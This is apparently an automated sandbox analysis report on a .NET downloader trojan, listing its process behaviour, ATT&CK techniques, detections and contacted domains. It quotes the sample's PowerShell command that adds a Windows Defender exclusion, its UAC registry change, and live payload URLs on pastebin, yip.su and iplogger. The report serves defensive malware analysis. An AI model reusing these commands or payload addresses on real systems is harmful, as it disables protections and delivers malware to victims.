          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: CB9008Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:UserProfileJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exeCode function: 0_2_00007FF67DCB5490 cpuid 0_2_00007FF67DCB5490
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exeCode function: 0_2_00007FF67DD195DC GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00007FF67DD195DC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Lowering of HIPS / PFW / Operating System Security Settings

          barindex
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System EnableLUAJump to behavior
          Source: Amcache.hve.7.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
          Source: Amcache.hve.7.drBinary or memory string: msmpeng.exe
          Source: Amcache.hve.7.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
          Source: Amcache.hve.7.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
          Source: Amcache.hve.7.drBinary or memory string: MsMpEng.exe
          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity Information11
          Scripting
          Valid AccountsWindows Management Instrumentation11
          Scripting
          1
          Access Token Manipulation
          11
          Masquerading
          OS Credential Dumping1
          System Time Discovery
          Remote Services1
          Archive Collected Data
          1
          Web Service
          Exfiltration Over Other Network MediumAbuse Accessibility Features
          CredentialsDomainsDefault AccountsScheduled Task/Job2
          Registry Run Keys / Startup Folder
          311
          Process Injection
          21
          Disable or Modify Tools
          LSASS Memory21
          Security Software Discovery
          Remote Desktop ProtocolData from Removable Media11
          Encrypted Channel
          Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain AccountsAt1
          DLL Side-Loading
          2
          Registry Run Keys / Startup Folder
          41
          Virtualization/Sandbox Evasion
          Security Account Manager1
          Process Discovery
          SMB/Windows Admin SharesData from Network Shared Drive3
          Ingress Tool Transfer
          Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
          DLL Side-Loading
          1
          Access Token Manipulation
          NTDS41
          Virtualization/Sandbox Evasion
          Distributed Component Object ModelInput Capture3
          Non-Application Layer Protocol
          Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script311
          Process Injection
          LSA Secrets1
          Application Window Discovery
          SSHKeylogging4
          Application Layer Protocol
          Scheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
          Deobfuscate/Decode Files or Information
          Cached Domain Credentials1
          System Network Configuration Discovery
          VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
          Obfuscated Files or Information
          DCSync2
          File and Directory Discovery
          Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
          DLL Side-Loading
          Proc Filesystem34
          System Information Discovery
          Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1512141 Sample: SecuriteInfo.com.Trojan.Dow... Startdate: 16/09/2024 Architecture: WINDOWS Score: 100 51 pastebin.com 2->51 53 yip.su 2->53 55 3 other IPs or domains 2->55 65 Antivirus detection for URL or domain 2->65 67 Antivirus / Scanner detection for submitted sample 2->67 69 Multi AV Scanner detection for submitted file 2->69 73 5 other signatures 2->73 8 SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exe 2 2->8         started        11 svchost.exe 1 1 2->11         started        14 cmd.exe 2->14         started        16 22 other processes 2->16 signatures3 71 Connects to a pastebin service (likely for C&C) 51->71 process4 dnsIp5 81 Writes to foreign memory regions 8->81 83 Allocates memory in foreign processes 8->83 85 Adds a directory exclusion to Windows Defender 8->85 87 2 other signatures 8->87 18 MSBuild.exe 15 18 8->18         started        23 powershell.exe 23 8->23         started        25 conhost.exe 8->25         started        35 2 other processes 8->35 63 127.0.0.1 unknown unknown 11->63 27 conhost.exe 14->27         started        29 conhost.exe 16->29         started        31 conhost.exe 16->31         started        33 conhost.exe 16->33         started        37 19 other processes 16->37 signatures6 process7 dnsIp8 57 pastebin.com 104.20.4.235, 443, 49713, 49719 CLOUDFLARENETUS United States 18->57 59 iplogger.com 104.21.76.57, 443, 49732, 49739 CLOUDFLARENETUS United States 18->59 61 yip.su 188.114.97.3, 443, 49716, 49722 CLOUDFLARENETUS European Union 18->61 43 C:\Users\...\v6vceHiI5YDkGCej6J99jPOi.bat, ASCII 18->43 dropped 45 C:\Users\...\Q0yFl4HZQFpr4zRkESdCNqpF.bat, ASCII 18->45 dropped 47 C:\Users\...47QwtNbU54qs5kl5tTGMFFPkC.bat, ASCII 18->47 dropped 49 2 other malicious files 18->49 dropped 75 Drops script or batch files to the startup folder 18->75 77 Creates HTML files with .exe extension (expired dropper behavior) 18->77 79 Loading BitLocker PowerShell Module 23->79 39 conhost.exe 23->39         started        41 WmiPrvSE.exe 23->41         started        file9 signatures10 process11

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand
          SourceDetectionScannerLabelLink
          SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exe61%ReversingLabsWin64.Trojan.Amadey
          SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exe100%AviraTR/AD.Nekark.zljya
          No Antivirus matches
          No Antivirus matches
          No Antivirus matches
          SourceDetectionScannerLabelLink
          https://sectigo.com/CPS00%URL Reputationsafe
          http://crt.sectigo.com/SectigoPublicTimeStampingCAR36.crt0#0%URL Reputationsafe
          http://ocsp.sectigo.com00%URL Reputationsafe
          http://upx.sf.net0%URL Reputationsafe
          http://crl.sectigo.com/SectigoPublicTimeStampingRootR46.crl00%URL Reputationsafe
          http://crl.sectigo.com/SectigoPublicTimeStampingCAR36.crl0z0%URL Reputationsafe
          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
          http://crt.sectigo.com/SectigoPublicTimeStampingRootR46.p7c0#0%URL Reputationsafe
          http://c.pki.goog/r/gsr1.crl00%Avira URL Cloudsafe
          https://yip.su/RNWPd0%Avira URL Cloudsafe
          http://crl.ver)0%Avira URL Cloudsafe
          http://i.pki.goog/we1.crt00%Avira URL Cloudsafe
          http://yip.su0%Avira URL Cloudsafe
          https://aka.ms/nativeaot-compatibilityy0%Avira URL Cloudsafe
          https://g.live.com/odclientsettings/ProdV21C:0%Avira URL Cloudsafe
          https://aka.ms/nativeaot-c0%Avira URL Cloudsafe
          https://cdn.iplogger.org/favicon.ico0%Avira URL Cloudsafe
          https://www.cloudflare.com/learning/access-management/phishing-attack/0%Avira URL Cloudsafe
          https://iplogger.org/0%Avira URL Cloudsafe
          https://pastebin.com/raw/V6VJsrV31https://yip.su/RNWPd.exe7https://iplogger.com/1djqU40%Avira URL Cloudsafe
          https://cdn.iplogger.org/redirect/logo-dark.png);background-position:center;background-repeat:no-rep0%Avira URL Cloudsafe
          https://yip.su/redirect-0%Avira URL Cloudsafe
          https://yip.su/RNWPd.exe100%Avira URL Cloudmalware
          https://iplogger.com/1djqU40%Avira URL Cloudsafe
          https://www.cloudflare.com/5xx-error-landing0%Avira URL Cloudsafe
          https://yip.sudd0%Avira URL Cloudsafe
          https://pastebin.com/raw/V6VJsrV3100%Avira URL Cloudmalware
          https://g.live.com/odclientsettings/Prod1C:0%Avira URL Cloudsafe
          https://yip.su0%Avira URL Cloudsafe
          http://i.pki.goog/gsr1.crt0-0%Avira URL Cloudsafe
          https://counter.yadro.ru/hit?0%Avira URL Cloudsafe
          https://iplogger.org/rules/0%Avira URL Cloudsafe
          http://c.pki.goog/r/r4.crl00%Avira URL Cloudsafe
          http://o.pki.goog/s/we1/mus0%0%Avira URL Cloudsafe
          http://i.pki.goog/r4.crt00%Avira URL Cloudsafe
          https://aka.ms/nativeaot-compatibility0%Avira URL Cloudsafe
          https://pastebin.com0%Avira URL Cloudsafe
          https://aka.ms/GlobalizationInvariantMode0%Avira URL Cloudsafe
          https://aka.ms/nativeaot-compatibilityh0%Avira URL Cloudsafe
          https://iplogger.org/privacy/0%Avira URL Cloudsafe
          NameIPActiveMaliciousAntivirus DetectionReputation
          yip.su
          188.114.97.3
          truefalse
            unknown
            pastebin.com
            104.20.4.235
            truetrue
              unknown
              fp2e7a.wpc.phicdn.net
              192.229.221.95
              truefalse
                unknown
                iplogger.com
                104.21.76.57
                truefalse
                  unknown
                  NameMaliciousAntivirus DetectionReputation
                  https://pastebin.com/raw/V6VJsrV3true
                  • Avira URL Cloud: malware
                  unknown
                  https://yip.su/RNWPd.exefalse
                  • Avira URL Cloud: malware
                  unknown
                  https://iplogger.com/1djqU4false
                  • Avira URL Cloud: safe
                  unknown
                  NameSourceMaliciousAntivirus DetectionReputation
                  https://www.cloudflare.com/learning/access-management/phishing-attack/MSBuild.exe, 00000007.00000002.4623253256.0000000003167000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://sectigo.com/CPS0SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exefalse
                  • URL Reputation: safe
                  unknown
                  http://crt.sectigo.com/SectigoPublicTimeStampingCAR36.crt0#SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exefalse
                  • URL Reputation: safe
                  unknown
                  http://ocsp.sectigo.com0SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exefalse
                  • URL Reputation: safe
                  unknown
                  https://aka.ms/nativeaot-cSecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exefalse
                  • Avira URL Cloud: safe
                  unknown
                  http://yip.suMSBuild.exe, 00000007.00000002.4623253256.00000000030CC000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://aka.ms/nativeaot-compatibilityySecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exefalse
                  • Avira URL Cloud: safe
                  unknown
                  http://i.pki.goog/we1.crt0MSBuild.exe, 00000007.00000002.4622387096.0000000001037000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://yip.su/RNWPdMSBuild.exe, 00000007.00000002.4623253256.00000000030D0000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000007.00000002.4623253256.00000000030F3000.00000004.00000800.00020000.00000000.sdmp, OpxuPHiFHgdrtftYca7HLIbc.exe.7.dr, RrubXdXqzbveJvxl1Tifb4PD.exe.7.dr, d6stDH4n7YYIgzL0Ov3IxLa8.exe.7.dr, FMT2OeifGUTNfkZyqLG0jeEO.exe.7.dr, cl3vhpdkLtmoLXWJKBugbJDP.exe.7.dr, eTNltv0LYVQnDdBl6tKVEYLr.exe.7.dr, Zu7wa3hTioo41CyobTIbG45C.exe.7.dr, sOj9v5fBDMPcMK0zpX2B6CYH.exe.7.dr, UzLdRf9lIFGRsFA8wLSHgzsn.exe.7.dr, oqEo8V5wvVLKNc2VytL8EAsq.exe.7.drfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://cdn.iplogger.org/favicon.icoMSBuild.exe, 00000007.00000002.4623253256.00000000030D0000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000007.00000002.4623253256.00000000030F3000.00000004.00000800.00020000.00000000.sdmp, OpxuPHiFHgdrtftYca7HLIbc.exe.7.dr, RrubXdXqzbveJvxl1Tifb4PD.exe.7.dr, d6stDH4n7YYIgzL0Ov3IxLa8.exe.7.dr, FMT2OeifGUTNfkZyqLG0jeEO.exe.7.dr, cl3vhpdkLtmoLXWJKBugbJDP.exe.7.dr, eTNltv0LYVQnDdBl6tKVEYLr.exe.7.dr, Zu7wa3hTioo41CyobTIbG45C.exe.7.dr, sOj9v5fBDMPcMK0zpX2B6CYH.exe.7.dr, UzLdRf9lIFGRsFA8wLSHgzsn.exe.7.dr, oqEo8V5wvVLKNc2VytL8EAsq.exe.7.drfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://c.pki.goog/r/gsr1.crl0MSBuild.exe, 00000007.00000002.4622387096.000000000109D000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://g.live.com/odclientsettings/ProdV21C:svchost.exe, 00000009.00000003.2174242561.000002CA7A660000.00000004.00000800.00020000.00000000.sdmp, edb.log.9.drfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://crl.ver)svchost.exe, 00000009.00000002.3816448684.000002CA7A800000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://iplogger.org/MSBuild.exe, 00000007.00000002.4623253256.00000000030D0000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000007.00000002.4623253256.0000000002FF4000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000007.00000002.4623253256.0000000002FAF000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000007.00000002.4623253256.00000000030F3000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000007.00000002.4623253256.0000000002FF8000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000007.00000002.4623253256.00000000030E3000.00000004.00000800.00020000.00000000.sdmp, OpxuPHiFHgdrtftYca7HLIbc.exe.7.dr, RrubXdXqzbveJvxl1Tifb4PD.exe.7.dr, d6stDH4n7YYIgzL0Ov3IxLa8.exe.7.dr, FMT2OeifGUTNfkZyqLG0jeEO.exe.7.dr, cl3vhpdkLtmoLXWJKBugbJDP.exe.7.dr, eTNltv0LYVQnDdBl6tKVEYLr.exe.7.dr, Zu7wa3hTioo41CyobTIbG45C.exe.7.dr, sOj9v5fBDMPcMK0zpX2B6CYH.exe.7.dr, UzLdRf9lIFGRsFA8wLSHgzsn.exe.7.dr, oqEo8V5wvVLKNc2VytL8EAsq.exe.7.drfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://upx.sf.netAmcache.hve.7.drfalse
                  • URL Reputation: safe
                  unknown
                  https://cdn.iplogger.org/redirect/logo-dark.png);background-position:center;background-repeat:no-repMSBuild.exe, 00000007.00000002.4623253256.00000000030D0000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000007.00000002.4623253256.00000000030F3000.00000004.00000800.00020000.00000000.sdmp, OpxuPHiFHgdrtftYca7HLIbc.exe.7.dr, RrubXdXqzbveJvxl1Tifb4PD.exe.7.dr, d6stDH4n7YYIgzL0Ov3IxLa8.exe.7.dr, FMT2OeifGUTNfkZyqLG0jeEO.exe.7.dr, cl3vhpdkLtmoLXWJKBugbJDP.exe.7.dr, eTNltv0LYVQnDdBl6tKVEYLr.exe.7.dr, Zu7wa3hTioo41CyobTIbG45C.exe.7.dr, sOj9v5fBDMPcMK0zpX2B6CYH.exe.7.dr, UzLdRf9lIFGRsFA8wLSHgzsn.exe.7.dr, oqEo8V5wvVLKNc2VytL8EAsq.exe.7.drfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://yip.su/redirect-MSBuild.exe, 00000007.00000002.4623253256.00000000030D0000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000007.00000002.4623253256.0000000002FF4000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000007.00000002.4623253256.0000000002FAF000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000007.00000002.4623253256.00000000030F3000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000007.00000002.4623253256.0000000002FF8000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000007.00000002.4623253256.00000000030E3000.00000004.00000800.00020000.00000000.sdmp, OpxuPHiFHgdrtftYca7HLIbc.exe.7.dr, RrubXdXqzbveJvxl1Tifb4PD.exe.7.dr, d6stDH4n7YYIgzL0Ov3IxLa8.exe.7.dr, FMT2OeifGUTNfkZyqLG0jeEO.exe.7.dr, cl3vhpdkLtmoLXWJKBugbJDP.exe.7.dr, eTNltv0LYVQnDdBl6tKVEYLr.exe.7.dr, Zu7wa3hTioo41CyobTIbG45C.exe.7.dr, sOj9v5fBDMPcMK0zpX2B6CYH.exe.7.dr, UzLdRf9lIFGRsFA8wLSHgzsn.exe.7.dr, oqEo8V5wvVLKNc2VytL8EAsq.exe.7.drfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://yip.suddMSBuild.exe, 00000007.00000002.4623253256.0000000003041000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://pastebin.com/raw/V6VJsrV31https://yip.su/RNWPd.exe7https://iplogger.com/1djqU4SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exe, 00000000.00000002.2168250882.0000019C1E400000.00000004.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000007.00000002.4622227958.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://www.cloudflare.com/5xx-error-landingMSBuild.exe, 00000007.00000002.4623253256.00000000030B0000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://crl.sectigo.com/SectigoPublicTimeStampingRootR46.crl0SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exefalse
                  • URL Reputation: safe
                  unknown
                  https://g.live.com/odclientsettings/Prod1C:qmgr.db.9.drfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://counter.yadro.ru/hit?MSBuild.exe, 00000007.00000002.4623253256.00000000030D0000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000007.00000002.4623253256.0000000002FF4000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000007.00000002.4623253256.0000000002FAF000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000007.00000002.4623253256.00000000030F3000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000007.00000002.4623253256.0000000002FF8000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000007.00000002.4623253256.00000000030E3000.00000004.00000800.00020000.00000000.sdmp, OpxuPHiFHgdrtftYca7HLIbc.exe.7.dr, RrubXdXqzbveJvxl1Tifb4PD.exe.7.dr, d6stDH4n7YYIgzL0Ov3IxLa8.exe.7.dr, FMT2OeifGUTNfkZyqLG0jeEO.exe.7.dr, cl3vhpdkLtmoLXWJKBugbJDP.exe.7.dr, eTNltv0LYVQnDdBl6tKVEYLr.exe.7.dr, Zu7wa3hTioo41CyobTIbG45C.exe.7.dr, sOj9v5fBDMPcMK0zpX2B6CYH.exe.7.dr, UzLdRf9lIFGRsFA8wLSHgzsn.exe.7.dr, oqEo8V5wvVLKNc2VytL8EAsq.exe.7.drfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://yip.suMSBuild.exe, 00000007.00000002.4623253256.0000000003041000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000007.00000002.4623253256.00000000030CC000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://i.pki.goog/gsr1.crt0-MSBuild.exe, 00000007.00000002.4622387096.000000000109D000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://crl.sectigo.com/SectigoPublicTimeStampingCAR36.crl0zSecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exefalse
                  • URL Reputation: safe
                  unknown
                  http://c.pki.goog/r/r4.crl0MSBuild.exe, 00000007.00000002.4625191129.0000000005EF5000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://aka.ms/nativeaot-compatibilitySecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exefalse
                  • Avira URL Cloud: safe
                  unknown
                  http://o.pki.goog/s/we1/mus0%MSBuild.exe, 00000007.00000002.4622387096.0000000001037000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://aka.ms/nativeaot-compatibilityYSecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exefalse
                    unknown
